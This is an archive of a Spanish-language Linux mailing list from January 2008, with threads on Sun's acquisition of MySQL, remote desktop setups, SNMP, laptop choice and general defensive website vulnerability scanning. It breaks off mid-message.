Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Horst H. von Brand escribió: Dame solo /un/ ejemplo de alguien de real estatura en codigo abierto que haya dejado el codigo abierto vendiendose al mejor postor. No se si al mejor postor, pero se que el creador de gentoo se fue a trabajar a microsoft, despues creo que volvio pero no se mas. seria el unico ejemplo que podria tener , pero tampoco se si es aplicable. De todas formas yo creo que esta noticia no tiene mucho de sorpresiva, pero no creo que llegue a ser algo malo para el opensource. Destaco que he seguido el thread y me parece muy interesante los argumentos que se dan :) Aunque me inclino a pensar que el autor original hizo este thread al mas puro troll style! ;-) -- .:: Pedro:G:M ::. Linux User #397462 http://counter.li.org From [EMAIL PROTECTED] Fri Jan 18 09:17:39 2008 From: [EMAIL PROTECTED] (=?iso-8859-1?q?C=E9sar_Sep=FAlveda?=) Date: Fri Jan 18 09:20:28 2008 Subject: Ayuda con Escritorio Remoto In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] El Thursday 17 January 2008 22:55:06 Ismael Cantieri escribió: El día 17/01/08, Sebastian Antunez Noguera [EMAIL PROTECTED] escribió: Estimados, tengo el siguiente problema. Tengo 4 servidores en un data center con CenTos 5.1 y tienen habilitado Ambiente Grafico (Gnome). Necesito saber como poder configurar los escritorios para que los desarrolladores puedan a traves de sus estaciones de trabajo con Fedora acceder a los CenTos desde su maquina y ver el entorno grafico de estos servidores CenTos. A la vez, necesito saber si existe algun cliente que pueda tomar estos escritorios (CenTos) pero desde M$ Windows ya que dos Desarrolladores usan XP por un tema de una aplicacion que solo corre en M$ Gracias nuevamente por su ayuda vnc ;) a través de un túnel ssh SAN Con vnc entraran todos a la misma sesion y no tendra una sesion en X cada usuario por separado. yo voy más for freeNX
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Victor Hugo dos Santos escribió: 2008/1/17 Germán Poó-Caamaño [EMAIL PROTECTED]: On Thu, 2008-01-17 at 10:57 -0300, Alvaro Herrera wrote: 5. I don't know right now what Sun will do about MySQL 6.0, Falcon, MySQL Cluster, licensing, InnoDB, or specific members of the MySQL staff. So don't ask me. !Lo que sucede es que los de MySQL son unos vendidos! rechazarías vos US$ 1.000 millones ??? Creo que esta era la oportunidad para ellos y la aprovecharon bien. en todo caso no entiendo el porque del enojo de varios... hasta donde entiendo, continuamos teniendo al código de mysql disponible (ya que estaba bajo GPL) cierto ?? y caso, alguno este interesado podrá continuar trabajando en la nueva versión de yousql, o me equivoco ?? Una cosa que no se ha comentado para nada en este thread es si Sun va a continuar el desarrollo de MySQL bajo un modelo abierto. Se ha asumido que con esta venta, MySQL libre se acabó totalmente, y mi corazonada (y la de varios en la lista pgsql-advocacy) es que no será así. Es decir, Sun no compró MySQL para destruirlo, sino para poder vender más servidores. Recordemos que Sun no está en el negocio de vender bases de datos (incluso tienen su propio sistema operativo libre, OpenSolaris, y lo llevan adelante con uñas y dientes y han hecho varias cosas buenas), sino hardware (o más bien, plataformas o quizás soluciones). Si hubiera sido Oracle el que hubiera comprado MySQL el panorama sería totalmente distinto. Pero Sun no es Oracle. Personalmente creo que tenemos MySQL para rato. Y quizás desde ahora sea más libre que antes, no menos, i.e. no es imposible que Sun termine con el esquema de licenciamiento comercial -- bajo la idea de que un MySQL más libre les permitirá ofrecer una mayor gama de servicios. -- Alvaro Herrera http://www.flickr.com/photos/alvherre/ Licensee shall have no right to use the Licensed Software for productive or commercial use. (Licencia de StarOffice 6.0 beta) From [EMAIL PROTECTED] Fri Jan 18 09:36:07 2008 From: [EMAIL PROTECTED] (Alvaro Herrera) Date: Fri Jan 18 09:39:18 2008 Subject: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Victor Hugo dos Santos escribió: On Jan 17, 2008 6:19 PM, Alvaro Herrera [EMAIL PROTECTED] wrote: Moises Alberto Lindo Gutarra escribió: [...] Postgres no se puede comprar de la misma forma, porque no hay accionistas ni entidad comercial alguna. Solo hay una comunidad y un repositorio de codigo que se entrega con licencia BSD. bueno.. de la misma manera no .. pero se podría comprar el código de cada uno (o de la mayoría) de los desarrolladores, cierto ??? creo que paso algo así con snort o otro que no me recuerdo ahora. Sí, pero no valdría nada, porque el código ya está liberado bajo licencia BSD, lo que significa que cualquier otro grupo de desarrolladores puede tomarlo y continuar desarrollando. obs.: se llega a pasarlo y usted entra para la lista de los top 500 ($$$), no te olvides de nosotros y invita nos a un asado, vale ??? No te quepa duda ;-) -- Alvaro Herrera Developer, http://www.PostgreSQL.org/ No hay ausente sin culpa ni presente sin disculpa (Prov. francés) From [EMAIL PROTECTED] Fri Jan 18 10:16:49 2008 From: [EMAIL PROTECTED] (Arturo Mardones) Date: Fri Jan 18 10:19:59 2008 Subject: Protocolo SNMP In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] On Jan 16, 2008 5:28 PM, Daniel Alberto Ortiz Lara [EMAIL PROTECTED] wrote: Buenas Tardes. La presente es para solicitar ayuda en cuanto al protocolo snmp en mi linux debian etch. ¿como hago para saber que version snmp utilizar mi equipo? ¿Existe algún comando que me permita hacerlo? Necesito ayuda con esto por favor y todo lo relacionado al protocolo snmp. Algún manual o tutorial o guia de snmp que este super completa para estudiarla? Sin más a que hacer referencia Se despide afectuosamente Daniel Ortiz Caracas-Venezuela Hola Daniel, instala los paquetes snmp de tu distro y revisa los man, son bastante buenos y te pueden ayudar a entender que puedes obtener de cada uno, eso si focalizate en lo que quieres hacer con snmp, porque snmp es mplio en lo que puede hacer. Ahora si dices que quieres hacer, talvez podamos sugerirte algo mejor. Saludos! Arturo. -- http://animaldelared.blogspot.com
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Yo creo que es cierto que el software libre es un peligro para las ganancias egoístas o para el modelo neoliberal (M$ y otras) pero especialmente su modelo de licencias GPL ya que lo que siempre esta en juego es la propiedad de conocimiento. Basta recordar que hacer click tiene patente por parte de micro-soft. Si yo soy dueño del conocimiento soy dueño de sus ganancias. ¿Pero esta en peligro en Movimiento del software libre ?. ¿Cuantas empresas bastan para contratar a los desarrolladores y mantenedores de software libre y mantenerlos ocupados al punto que ni siquiera actualizar los problemas de seguridad.?. Bueno yo creo que este es un problema en desarrollo y mantener el movimiento de opensource también es un problema económico no solo de fidelidad y militancia.Y sin duda que esto no va a acabar hasta que las patentes propietarias no acaben o tengan un limite razonable. This message was sent using IMP, the Internet Messaging Program.
Ethical Hacking, aspectos a considerar.
Asdtaker wrote: Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora de realizar un escaneo de vulnerabilidades a mi sitio web? Informarte que si las versiones del software que estas ocupando para dicho servidor web presentan algún tipo de vulnerabilidad conocida. Herramientas como nmap, nessus o el siempre útil netcat pueden ayudarte con esa tarea. Ya lo otro es buscar si existen como te decia vulnerabilidades o uno que otro 'zero day' disponibles en la red. Si tienes la oportunidad de preocuparte con el acceso físico a la máquina, ya que sacando solo un cable, te pueden regalar un simpático DoS. -- Eduardo Peña Ceballos Estudiante Ingeniería (e) Informática - PUCV http://www.kope.cl
Ayuda con Escritorio Remoto
On 18/01/2008, César Sepúlveda [EMAIL PROTECTED] wrote: Con vnc entraran todos a la misma sesion y no tendra una sesion en X cada usuario por separado. Eso no es tan así, porque podrías levantar varios servders, donde el primero se conecta al :1, leugo el segundo al :2, etc yo voy más for freeNX Lo que sea más administrable y venga en la distro ;-.) -- Carlos A. Sepúlveda M. ICQ:31472448 GTALK/MSN:carlos.sepulveda[at]gmail.com http://carlos.sepulveda.googlepages.com
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
2008/1/18 Alvaro Herrera [EMAIL PROTECTED]: [...] Si hubiera sido Oracle el que hubiera comprado MySQL el panorama sería totalmente distinto. Pero Sun no es Oracle. Si bien concuerdo con que Sun no tiene intención de cambiar el modelo de desarrollo de MySQL, Sun y Oracle ahora son más competencia que antes, sobre todo considerando que Oracle compró BEA. -- Leo Soto M. http://blog.leosoto.com
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Alvaro Herrera wrote: Victor Hugo dos Santos escribió: 2008/1/17 Germán Poó-Caamaño [EMAIL PROTECTED]: On Thu, 2008-01-17 at 10:57 -0300, Alvaro Herrera wrote: 5. I don't know right now what Sun will do about MySQL 6.0, Falcon, MySQL Cluster, licensing, InnoDB, or specific members of the MySQL staff. So don't ask me. !Lo que sucede es que los de MySQL son unos vendidos! rechazarías vos US$ 1.000 millones ??? Creo que esta era la oportunidad para ellos y la aprovecharon bien. en todo caso no entiendo el porque del enojo de varios... hasta donde entiendo, continuamos teniendo al código de mysql disponible (ya que estaba bajo GPL) cierto ?? y caso, alguno este interesado podrá continuar trabajando en la nueva versión de yousql, o me equivoco ?? Una cosa que no se ha comentado para nada en este thread es si Sun va a continuar el desarrollo de MySQL bajo un modelo abierto. Se ha asumido que con esta venta, MySQL libre se acabó totalmente, en serio pensaste eso? por mi parte ni se me habia ocurrido... no tiene sentido ya que el negocio de Sun no son las bases de datos. y mi corazonada (y la de varios en la lista pgsql-advocacy) es que no será así. Es decir, Sun no compró MySQL para destruirlo, sino para poder vender más servidores. hay un articulo[1] interesante, publicado solo dias antes de la compra Sun/MySQL, que habla de las recientes compras de proyectos open source por parte de empresas grandes (Yahoo/Zimbra, Citrix/XenSource, etc,) y su crecimiento. se estima que el 2008 habran muchas mas compras que el 2007... aunque la compra de Sun/MySQL es (al parecer) la mas grande hasta el momento. Recordemos que Sun no está en el negocio de vender bases de datos (incluso tienen su propio sistema operativo libre, OpenSolaris, y lo llevan adelante con uñas y dientes y han hecho varias cosas buenas), sino hardware (o más bien, plataformas o quizás soluciones). Si hubiera sido Oracle el que hubiera comprado MySQL el panorama sería totalmente distinto. Pero Sun no es Oracle. Personalmente creo que tenemos MySQL para rato. Y quizás desde ahora sea más libre que antes, no menos, i.e. no es imposible que Sun termine con el esquema de licenciamiento comercial -- bajo la idea de que un MySQL más libre les permitirá ofrecer una mayor gama de servicios. si tomamos el ejemplo de Sun/PostgreSQL, aparte del soporte[2], que otros servicios podria Sun ofrecer en relacion a MySQL? [1] http://www.the451group.com/report_view/report_view.php?entity_id=51385dealbook=refer [2] http://www.sun.com/software/products/postgresql/support.jsp -- Ricardo Mun~oz A. Usuario Linux #182825 (counter.li.org) From [EMAIL PROTECTED] Fri Jan 18 11:27:53 2008 From: [EMAIL PROTECTED] (Carlos (casep) Sepulveda) Date: Fri Jan 18 11:31:07 2008 Subject: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] On 18/01/2008, Ricardo Mun~oz A. [EMAIL PROTECTED] wrote: si tomamos el ejemplo de Sun/PostgreSQL, aparte del soporte[2], que otros servicios podria Sun ofrecer en relacion a MySQL? Nombre/respaldo? Recuerdo que en un cliente sólo pudimos meter mysql porque contaba con soporte Novell (qué pasará con esto?) Mysql a secas no lo compraban... -- Carlos A. Sepúlveda M. ICQ:31472448 GTALK/MSN:carlos.sepulveda[at]gmail.com http://carlos.sepulveda.googlepages.com
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Ricardo Mun~oz A. escribió: Alvaro Herrera wrote: Una cosa que no se ha comentado para nada en este thread es si Sun va a continuar el desarrollo de MySQL bajo un modelo abierto. Se ha asumido que con esta venta, MySQL libre se acabó totalmente, en serio pensaste eso? por mi parte ni se me habia ocurrido... no tiene sentido ya que el negocio de Sun no son las bases de datos. Yo no, pero otros articulos en este thread sugieren eso ... o al menos esa impresión me dio: que la venta era algo totalmente negativo. si tomamos el ejemplo de Sun/PostgreSQL, aparte del soporte[2], que otros servicios podria Sun ofrecer en relacion a MySQL? Bueno, ahora que Sun tiene a todo el equipo de desarrollo de MySQL dentro de si, puede ofrecer servicios mas complejos, como por ej. analisis de rendimiento en casos especiales (alta carga, granjas de servidores, etc) en los que MySQL actualmente es pobre. Tambien piensa que un cliente importante (como Google) puede poner fondos para influir la direccion de desarrollo: sistemas de replicacion mas robustos, etc. Ahora Sun puede, ademas, vender servidores MySQL como appliances ... ¿no te parece un tremendo negocio? Compras la caja, enchufas, te conectas a la interfaz web para crear bases de datos, usuarios, etc ... Compre Sun MySQL, el servidor de bases de datos mas popular del mundo, etc. Con herramientas automatizadas para reconfigurar cuando quieres agregar mas discos, mas CPUs, etc. Por otra parte, Sun tiene el famoso Niagara, que es un procesador _pensado_ para correr sistemas multithread, y MySQL es justamente eso. Escalabilidad MySQL a toda prueba -- compre Sun Niagara -- Alvaro Herrerahttp://www.advogato.org/person/alvherre A male gynecologist is like an auto mechanic who never owned a car. (Carrie Snow) From [EMAIL PROTECTED] Fri Jan 18 14:16:33 2008 From: [EMAIL PROTECTED] (Rodrigo Fuentealba) Date: Fri Jan 18 14:19:44 2008 Subject: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] 2008/1/18, Alvaro Herrera [EMAIL PROTECTED]: Ricardo Mun~oz A. escribió: Alvaro Herrera wrote: Una cosa que no se ha comentado para nada en este thread es si Sun va a continuar el desarrollo de MySQL bajo un modelo abierto. Se ha asumido que con esta venta, MySQL libre se acabó totalmente, ¿Por qué? Microsoft (la más cerrada de todas las cerradas) tiene abierto el código de Silverlight (su gran tontera nueva para .NET) y está manteniendo varias cosas interesantes en CodePlex; inclusive ellos contrataron al personaje que desarrolló IronPython (y todos dijimos buuu, se acabó IronPython) para potenciarlo bajo este modelo libre. en serio pensaste eso? por mi parte ni se me habia ocurrido... no tiene sentido ya que el negocio de Sun no son las bases de datos. Son las máquinas. Un amigo me decía que era absurdo que Sun cerrara el código de MySQL, a menos que ahora para poder usar MySQL se obligue a comprar MySUN Database Server; pero eso es (casi) imposible. si tomamos el ejemplo de Sun/PostgreSQL, aparte del soporte[2], que otros servicios podria Sun ofrecer en relacion a MySQL? Bueno, ahora que Sun tiene a todo el equipo de desarrollo de MySQL dentro de si, puede ofrecer servicios mas complejos, como por ej. analisis de rendimiento en casos especiales (alta carga, granjas de servidores, etc) en los que MySQL actualmente es pobre. Tambien piensa que un cliente importante (como Google) puede poner fondos para influir la direccion de desarrollo: sistemas de replicacion mas robustos, etc. Google + Sun Microsystems es una tremenda idea. Ahora Sun puede, ademas, vender servidores MySQL como appliances ... No me había percatado de esta parte del mail cuando lo leí. ¿no te parece un tremendo negocio? Compras la caja, enchufas, te conectas a la interfaz web para crear bases de datos, usuarios, etc ... Compre Sun MySQL, el servidor de bases de datos mas popular del mundo, A menos que mantenga libre el source de MySQL; tendría que ver qué tan bien le va, y qué ventajas podría ofrecer (aunque un clúster con OpenSolaris es relativamente sencillo de hacer, y escalar MySQL por ese lado tampoco es una mala idea.) Por otra parte, Sun tiene el famoso Niagara, que es un procesador _pensado_ para correr sistemas multithread, y MySQL es justamente eso. Escalabilidad MySQL a toda prueba -- compre Sun Niagara Bonito, me encanta el hardware Sun. Encantado trabajaría allá. /me mandando CV. -- Rodrigo Fuentealba
Laptop para Linux
Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Estoy entre un HP530 y un HP nx7400 Los componentes diferentes son: HP 530: - Intel Core Duo T2300 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GML Express - 2 USB - Batería 4 celdas HP nx7400 - Intel Core 2 Duo T5500 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GM Express - 3 USB - Bateria 3 celdas Mi principal duda es acerca del procesador. Yo no pienso usar un Linux de 64 bits, me funcionaria todo bien si uso un Linux de 32 bits en el Intel Core 2 Duo ? Por ahi vi que el nx7400 tiene pantalla no reflectante, me parecen mas agradables de usar. Alguien sabe cómo es la pantalla del hp 530? Saludos y gracias de antemano -- Franco
Laptop para Linux
franco. ningun problema con ejecutar aplicaciones 32 bits en el intel t5500. y funca sin problemas y te queda siempre la opcion de ejecutar codigo de 64 bits. en este momento lo tengo con Gentoo y un perfil de 64 bits. no tengo ningun problema para ejecutar ya sea de 32 o de 64. -- Cristian Gonzalo Gary Bufadel From [EMAIL PROTECTED] Fri Jan 18 15:01:13 2008 From: [EMAIL PROTECTED] (Jorge Severino) Date: Fri Jan 18 15:11:19 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Me gustan mas los Dell, son mas livianos. Atte. JSD From [EMAIL PROTECTED] Fri Jan 18 15:55:47 2008 From: [EMAIL PROTECTED] (=?utf-8?q?C=C3=A9sar_Sep=C3=BAlveda?=) Date: Fri Jan 18 15:58:46 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] El Friday 18 January 2008 14:39:07 Franco Catrin L. escribió: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Estoy entre un HP530 y un HP nx7400 Los componentes diferentes son: HP 530: - Intel Core Duo T2300 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GML Express - 2 USB - Batería 4 celdas HP nx7400 - Intel Core 2 Duo T5500 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GM Express - 3 USB - Bateria 3 celdas Mi principal duda es acerca del procesador. Yo no pienso usar un Linux de 64 bits, me funcionaria todo bien si uso un Linux de 32 bits en el Intel Core 2 Duo ? Por ahi vi que el nx7400 tiene pantalla no reflectante, me parecen mas agradables de usar. Alguien sabe cómo es la pantalla del hp 530? Saludos y gracias de antemano -- Franco pocos laptop los probe con linux, el el ultimo fue un inspiron 6400 con 2 gigas en ram, comprado en falabella, ahora llegaran más a 500 luquitas. andaba bastante rapido fc8 reconocio todo el hardware, y el video intel andaba bastante bien, aceleracion grafica automaticamente con el live cd, y tambien efectos de compiz y esas tonteritas, reconocio todo el harware menos la tarjeta inalambrica, a eso no le di vueltas ya que estaba con cable de red :p pero lo encontre un buen equipo y barato igual. aunque la verdad el procesador que trae no se si tiene EMT64 pd: un amigo tiene el 6400 y con ubuntu no tiene ningun problema con la red inalambrica. ni otra pieza de hardware.
Laptop para Linux
los equipos dell dejan mucho que desear en calidad, para ser sinceros, son derechamente malos (hablando de las lineas baratas, inspiron, xps, vostro.) sobre la arquitectura del procesador, los core2duo soportan i386 y x86_64 sin problemas. pero te recomiendo usar una distro de 32bits, la de 64 bits solo es útil si tienes más de 4gb de ram. y en la práctica las distros de 64bits y las de 32bits rinden igual, con contadas excepciones, como por ejemplo el software Mathematicas Saludos. El 18-01-2008, a las 15:01, Jorge Severino escribió: Me gustan mas los Dell, son mas livianos. Atte. JSD
Laptop para Linux
El día 18/01/08, César Sepúlveda [EMAIL PROTECTED] escribió: El Friday 18 January 2008 14:39:07 Franco Catrin L. escribió: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Estoy entre un HP530 y un HP nx7400 Los componentes diferentes son: HP 530: - Intel Core Duo T2300 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel(R) 945GML Express - 2 USB - Batería 4 celdas HP nx7400 - Intel Core 2 Duo T5500 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel(R) 945GM Express - 3 USB - Bateria 3 celdas Mi principal duda es acerca del procesador. Yo no pienso usar un Linux de 64 bits, me funcionaria todo bien si uso un Linux de 32 bits en el Intel Core 2 Duo ? Por ahi vi que el nx7400 tiene pantalla no reflectante, me parecen mas agradables de usar. Alguien sabe cómo es la pantalla del hp 530? Saludos y gracias de antemano -- Franco pocos laptop los probe con linux, el el ultimo fue un inspiron 6400 con 2 gigas en ram, comprado en falabella, ahora llegaran más a 500 luquitas. andaba bastante rapido fc8 reconocio todo el hardware, y el video intel andaba bastante bien, aceleracion grafica automaticamente con el live cd, y tambien efectos de compiz y esas tonteritas, reconocio todo el harware menos la tarjeta inalambrica, a eso no le di vueltas ya que estaba con cable de red :p pero lo encontre un buen equipo y barato igual. aunque la verdad el procesador que trae no se si tiene EMT64 pd: un amigo tiene el 6400 y con ubuntu no tiene ningun problema con la red inalambrica. ni otra pieza de hardware. Yo tengo un dell inspiron 6400 con debian lenny y no tengo ningun problema con hardware, ahora respecto a la pregunta de Catrin me inclino por le HP530, aunque no soy muy amigo de los HP a modo personal, muchos problemas con compatibilidad de hardware. -- Andrés Esteban. Ovalle Gahona Msn: [EMAIL PROTECTED] Ingenieria Ejecucion Computacion e Informatica Web: http://aovalle.tuxserv.cl Movil: 09-5791839 Staff Debian.cl Usuario Linux #456290 (counter.li.org) From [EMAIL PROTECTED] Fri Jan 18 16:16:57 2008 From: [EMAIL PROTECTED] (Alberto Rivera) Date: Fri Jan 18 16:20:17 2008 Subject: Laptop para Linux In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Franco Catrin L. wrote: Hola! Necesito un poco de ayuda. Estoy cotizando un notebook para mi y me gustaria ver si en la lista hay gente que conozca algunos de los que me dan buena impresión. Hola Franco, mira lo mejor es que vayas a comprarlo con un livecd de ubuntu y uno de knoppix, así sabes altiro si funcionan todas las cosas, en el pero de los casos no te va a funcionar las tarjetas que tienen chipset broadcom pero le pones fw-cuuter y listo ... no te preocupes tanto ... mira el de mi señora es un hp nx6120, el mio es un acer travelñmate3010, tengo muchos amigos con Dell y hasta con lenovo, los que están causando problemas son los de dispositivos windomizados por ejemplo olidata, packard bell y no se que más pero lo otro tirate a la piscina no más y en el peor de lo casos te vienes pa mi oficina e instalamos ... salu2 Estoy entre un HP530 y un HP nx7400 Los componentes diferentes son: HP 530: - Intel Core Duo T2300 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GML Express - 2 USB - Batería 4 celdas HP nx7400 - Intel Core 2 Duo T5500 (1.66Ghz / 2MB cache L2) - Chipset Mobile? Intel® 945GM Express - 3 USB - Bateria 3 celdas Mi principal duda es acerca del procesador. Yo no pienso usar un Linux de 64 bits, me funcionaria todo bien si uso un Linux de 32 bits en el Intel Core 2 Duo ? Por ahi vi que el nx7400 tiene pantalla no reflectante, me parecen mas agradables de usar. Alguien sabe cómo es la pantalla del hp 530? Saludos y gracias de antemano -- Franco
Ethical Hacking, aspectos a considerar.
El 17/01/08, Asdtaker [EMAIL PROTECTED] escribió: Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora de realizar un escaneo de vulnerabilidades a mi sitio web? Por ahora considero estos ITEMs: - Ingenieria Social: informacion disponible en la web. - Archivos por defecto: todo aquello que viene con la instalacion en bruto del server web. - Extensiones por defecto: analizar el impacto de soportar distintas extensiones. - Sesiones: comprobar validez de sesiones, etc. - Manejo de errores: de aplicacion y servidor. - SQL Injection. deberías considerar los lenguajes de programación (Asp, Php) las bases de datos que ocupas (Sql Server,Oracle,Mysql,Postgresql) y las posibilidades de que sufran ataques por web browser las correctas actualizaciones de seguridad tanto del servidor como de las aplicaciones. Las aplicaciones correctas de filtros a traves de Firewall ,y la habilitación sólo de aquellos servicios que te son necesarios. Saludos. -- Patricio Morales Fariña Técnico en Computación Alumno Ing. Informática (Técnicos Vespertino) Universidad de los Lagos 045-219291- Temuco Chile cel 78732062-
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
Pedro GM [EMAIL PROTECTED] wrote: Horst H. von Brand escribió: Dame solo /un/ ejemplo de alguien de real estatura en codigo abierto que haya dejado el codigo abierto vendiendose al mejor postor. No se si al mejor postor, pero se que el creador de gentoo ... se fue de PLR en Gentoo, y otros llevaron a la distribucion a su estado actual... se fue a trabajar a microsoft, ... porque su idea de hacer $$ (No tener que vivir de cheque de sueldo a cheque de sueldo, como dijo) con Gentoo no funciono... despues creo que volvio ...y duro unos dias antes de comenzar un flamenwar que ya te encargo con otros desarrolladores, luego de lo cual se fue nuevamente antes de completar la semana (o lo fueron, no se detalles)... pero no se mas. seria el unico ejemplo que podria tener , pero tampoco se si es aplicable. Claramente demostro que no es capaz de manejar un proyecto del taman~o de una distro. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513 From [EMAIL PROTECTED] Fri Jan 18 16:46:17 2008 From: [EMAIL PROTECTED] (Horst H. von Brand) Date: Fri Jan 18 16:49:26 2008 Subject: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Alvaro Herrera [EMAIL PROTECTED] wrote: Victor Hugo dos Santos escribió: On Jan 17, 2008 6:19 PM, Alvaro Herrera [EMAIL PROTECTED] wrote: Moises Alberto Lindo Gutarra escribió: [...] Postgres no se puede comprar de la misma forma, porque no hay accionistas ni entidad comercial alguna. Solo hay una comunidad y un repositorio de codigo que se entrega con licencia BSD. bueno.. de la misma manera no .. pero se podrÃa comprar el código de cada uno (o de la mayorÃa) de los desarrolladores, cierto ??? creo que paso algo asà con snort o otro que no me recuerdo ahora. SÃ, pero no valdrÃa nada, porque el código ya está liberado bajo licencia BSD, lo que significa que cualquier otro grupo de desarrolladores puede tomarlo y continuar desarrollando. El tema de snort no es el programa, sino los datos que usa para clasificar ataques etc. Esa base de datos cambia rapidamente, y cuesta montones mantenerla. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513
Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
[EMAIL PROTECTED] wrote: Yo creo que es cierto que el software libre es un peligro para las ganancias egoÃstas o para el modelo neoliberal (M$ y otras) Es un peligro para el modelo de negocio de le vendemos la cajita con la licencia, claro. Otros modelos de negocio (tanto o mas neoliberales que ese) funcionan de lo mas bien con codigo abierto, gracias. IBM invierte /pesado/ en Linux, y lo hace porque asi gana plata. Igual Google. Sun compro Star Office, y de alli salio OOo. Nuevamente, no es por alguna idea romantica de liberar codigo porque tiene que ser libre, sino porque es un buen negocio. Red Hat lo que desarrolla o compra lo libera como codigo abierto. Y es la mayor empresa del rubro, lejos. Y no es precisamente una empresita PyME... pero especialmente su modelo de licencias GPL ya que lo que siempre esta en juego es la propiedad de conocimiento. No entiendo. Basta recordar que hacer click tiene patente por parte de micro-soft. Creo que la patente es de Google. Si yo soy dueño del conocimiento soy dueño de sus ganancias. El conocimiento no tiene duen~o, que es exactamente lo que el libre movimiento de datos por Internet ha demostrado (y asi ha dado posibilidad de existir al codigo abierto como lo conocemos hoy). ¿Pero esta en peligro en Movimiento del software libre ?. Codigo abierto? Todo indica que borrara del mapa los modelos de negocio de codigo cerrado... ¿Cuantas empresas bastan para contratar a los desarrolladores y mantenedores de software libre y mantenerlos ocupados Ya estan, no te preocupes. al punto que ni siquiera actualizar los problemas de seguridad.?. Seria suicidio de parte de esas empresas... Bueno yo creo que este es un problema en desarrollo y mantener el movimiento de opensource también es un problema económico no solo de fidelidad y militancia.Y sin duda que esto no va a acabar hasta que las patentes propietarias no acaben o tengan un limite razonable. No entendi... -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513 From [EMAIL PROTECTED] Fri Jan 18 16:56:08 2008 From: [EMAIL PROTECTED] (Horst H. von Brand) Date: Fri Jan 18 16:59:22 2008 Subject: Ethical Hacking, aspectos a considerar. In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] Rodrigo Fuentealba [EMAIL PROTECTED] wrote: [...] Seguridad por oscuridad no es seguridad, pero mientras detenga un tiempo más al posible victimario, igual sirve. El punto es que /no lo detiene en lo absoluto/. -- Dr. Horst H. von Brand User #22616 counter.li.org Departamento de InformaticaFono: +56 32 2654431 Universidad Tecnica Federico Santa Maria +56 32 2654239 Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513 From [EMAIL PROTECTED] Fri Jan 18 16:58:18 2008 From: [EMAIL PROTECTED] (Horst H. von Brand) Date: Fri Jan 18 17:01:33 2008 Subject: Ayuda con Escritorio Remoto In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED] Message-ID: [EMAIL PROTECTED] César Sepúlveda [EMAIL PROTECTED] wrote: El Thursday 17 January 2008 22:55:06 Ismael Cantieri escribió: El dÃa 17/01/08, Sebastian Antunez Noguera [EMAIL PROTECTED] escribió: Estimados, tengo el 